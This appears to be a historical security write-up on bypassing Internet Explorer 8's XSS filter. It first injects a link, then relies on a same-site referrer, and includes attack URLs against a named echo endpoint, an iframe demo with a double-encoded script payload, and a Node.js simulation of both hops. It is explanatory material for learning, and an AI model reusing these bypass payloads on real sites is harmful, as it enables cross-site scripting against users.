The IE8 XSS filter does not inspect a request whose referrer is the same site as the target URL. The attack therefore takes two hops against the same reflecting endpoint. The first request injects a plain anchor that points back at echo.php, with the real payload double URL-encoded inside its href. On this hop the filter has nothing to flag: an `<a href>` is not a script marker, and even after one decode the href reads `%3C%73...`, not `<script>`. The server's single decode leaves a once-encoded href sitting in the page as a harmless-looking link. When the victim clicks it, the browser sends that once-encoded value with a same-site referrer, the server decodes it into `<script>alert(location)</script>`, and the filter stays out of the way. The cost is one user click; `target=_top` makes the click navigate the top window rather than the attacker's iframe.
<!-- The two-step attack URL -->
<!-- Step 1: inject a link. ENCODED_SCRIPT_TAGS / ENCODED_CLOSE_TAGS stand for the
     double URL-encoded <script> and </script> (the iframe demo further down has the exact bytes) -->
http://www.cracking.com.ar/redir/echo.php?xss=<a href="echo.php?xss=ENCODED_SCRIPT_TAGS alert(location) ENCODED_CLOSE_TAGS" target=_top>I AM AN INJECTED LINK</a>
<!-- Step 2: the injected link, when clicked, makes a same-domain request
with the real <script>alert(location)</script> payload,
which the filter allows because the referrer matches -->
<!-- Working demo in an iframe -->
<iframe src='http://www.cracking.com.ar/redir/echo.php?xss=<a href=echo.php?xss=%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45alert(location)%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45 target=_top>I AM AN INJECTED LINK. Click me to bypass the XSS Filter</a>' width="600"></iframe>
The key insight: the filter only runs on navigations whose referrer is cross-site. A two-hop approach, first inject an anchor, then have the user click it, makes the second request same-site, while each hop taken on its own shows the filter nothing it flags: the first carries a harmless-looking link with the payload still encoded, the second is exempt from inspection altogether.
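As an added example (not code from the original post, and not the filter's real implementation), the following Node.js script models both hops end to end. `echoServer()` is a stand-in for echo.php that URL-decodes its `xss` parameter once and reflects it unescaped; `filterVerdict()` is a deliberately simplified model of the filter behaviour the post describes: no inspection when the referrer is same-site, otherwise a one-decode check for a reflected script tag. The attacker origin `attacker.example`, the filter model and the server model are assumptions; the target host and the double-encoded bytes are the post's own.

```javascript
// Added example: simulation of the two-hop referrer bypass. echoServer() is a
// stand-in for the post's echo.php; filterVerdict() is a simplified model of the
// IE8 XSS filter behaviour described in the post, not the filter's real logic.
const TARGET = "http://www.cracking.com.ar/redir/echo.php"; // host taken from the post
const ATTACKER_ORIGIN = "http://attacker.example/";          // assumed attacker page

// Percent-encode every character. Applied twice this yields the %25%33%43... form
// used in the post's href: one server-side decode turns it back into %3C%73...
function pctEncodeAll(s) {
  return Array.from(s, ch =>
    "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
}

// Vulnerable endpoint model: decode the xss parameter once and reflect it unescaped.
function echoServer(requestUrl) {
  const xss = new URL(requestUrl).searchParams.get("xss") || "";
  return `<html><body>${xss}</body></html>`;
}

// Simplified filter model (assumption): skip inspection entirely when the referrer
// is same-site; otherwise flag a request whose once-decoded query contains a
// script tag that is also reflected in the response.
function filterVerdict(requestUrl, referrer, responseBody) {
  const req = new URL(requestUrl);
  if (referrer && new URL(referrer).host === req.host) {
    return "skipped (same-site referrer)";
  }
  const decodedQuery = decodeURIComponent(req.search);
  const scriptTag = /<script/i;
  return scriptTag.test(decodedQuery) && scriptTag.test(responseBody) ? "blocked" : "allowed";
}

// The anchor injected on hop 1: payload double-encoded, alert(location) left as-is.
function buildInjectedAnchor() {
  const href = "echo.php?xss=" +
    pctEncodeAll(pctEncodeAll("<script>")) + "alert(location)" +
    pctEncodeAll(pctEncodeAll("</script>"));
  return `<a href="${href}" target=_top>I AM AN INJECTED LINK</a>`;
}

function runAttack() {
  // Hop 1: the attacker's page (cross-site referrer) loads the URL carrying the anchor.
  const hop1Url = TARGET + "?xss=" + buildInjectedAnchor();
  const hop1Page = echoServer(hop1Url);
  const hop1Verdict = filterVerdict(hop1Url, ATTACKER_ORIGIN, hop1Page);

  // Hop 2: the victim clicks the link. The relative href resolves against the
  // vulnerable page, so the referrer is now the vulnerable site itself.
  const href = hop1Page.match(/href="([^"]+)"/)[1];
  const hop2Url = new URL(href, TARGET).href;
  const hop2Page = echoServer(hop2Url);
  const hop2Verdict = filterVerdict(hop2Url, hop1Url, hop2Page);

  // Control: the same second request reached directly from a cross-site page.
  const hop2DirectVerdict = filterVerdict(hop2Url, ATTACKER_ORIGIN, hop2Page);

  return { hop1Url, hop1Page, hop1Verdict, hop2Url, hop2Page, hop2Verdict, hop2DirectVerdict };
}

console.log(JSON.stringify(runAttack(), null, 2));
```

Running it shows hop 1 rated "allowed" (the page holds only `%3C%73...`, no raw tag), hop 2 rated "skipped" because the referrer host matches, and the control run of the same second URL from the attacker's origin rated "blocked". That last line is the point of the two hops: the payload is identical, only the referrer changed.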
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.